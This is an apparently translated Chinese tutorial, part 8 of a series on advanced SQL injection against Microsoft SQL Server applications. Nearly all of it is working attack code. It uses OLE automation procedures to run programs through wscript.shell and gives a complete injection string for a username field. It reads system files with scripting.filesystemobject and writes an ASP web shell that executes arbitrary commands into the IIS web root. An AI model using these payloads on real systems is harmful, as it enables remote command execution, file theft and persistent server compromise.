[Sql server]应用程序中的高级SQL注入(8)

（1）这个例子使用''wscript.shell''对象建立了一个记事本的实例：

wscript.shell example

declare @o int

exec sp_oacreate ''wscript.shell'',@o out

exec sp_oamethod @o,''run'',NULL,''notepad.exe''

我们可以通过指定在用户名后面来执行它：

Username：''; declare @o int exec sp_oacreate ''wscript.shell'',@o out exec sp_oamethod @o,''run'',NULL,''notepad.exe''—

(2)这个例子使用''scripting.filesystemobject''对象读一个已知的文本文件：

--scripting.filesystemobject example – read a known file

declare @o int, @f int, @t int, @ret int

declare @line varchar(8000)

exec sp_oacreate ''scripting.filesystemobject'', @o out

exec sp_oamethod @o, ''opentextfile'', @f out, ''c:\boot.ini'', 1

exec @ret=sp_oamethod @f,''readline'',@line out

while(@ret=0)

begin

print @line

exec @ret=sp_oamethod @f,''readline'',@line out

end

(3)这个例子创建了一个能执行通过提交到的任何命令：

-- scripting.filesystemobject example – create a ''run this''.asp file

declare @o int,@f int,@t int,@ret int

exec sp_oacreate ''scripting.filesystemobject'',@o out

exec sp_oamethod @o,''createtextfile'',@f out,''c:\inetpub\wwwroot\foo.asp'',1

exec @ret=sp_oamethod @f,''writeline'',NULL,''＜% set o=server.createobject("wscript.shell"):o.run(request.querystring("cmd")) %>''

需要指出的是如果运行的环境是WIN NT4+IIS4平台上，那么通过这个程序运行的命令是以系统权限运行的。在IIS5中，它以一个比较低的权限IWAM_XXXaccount运行。

(4)这些例子阐述了这个技术的适用性；它可以使用''speech.voicetext''对象引起SQL SERVER发声：

declare @o int,@ret int

exec sp_oacreate ''speech.voicetext'',@o out

exec sp_oamethod @o,''register'',NULL,''foo'',''bar''

exec sp_oasetproperty @o,''speed'',150

exec sp_oamethod @o,''speak'',NULL,''all your sequel servers are belong to,us'',528

waitfor delay ''00:00:05''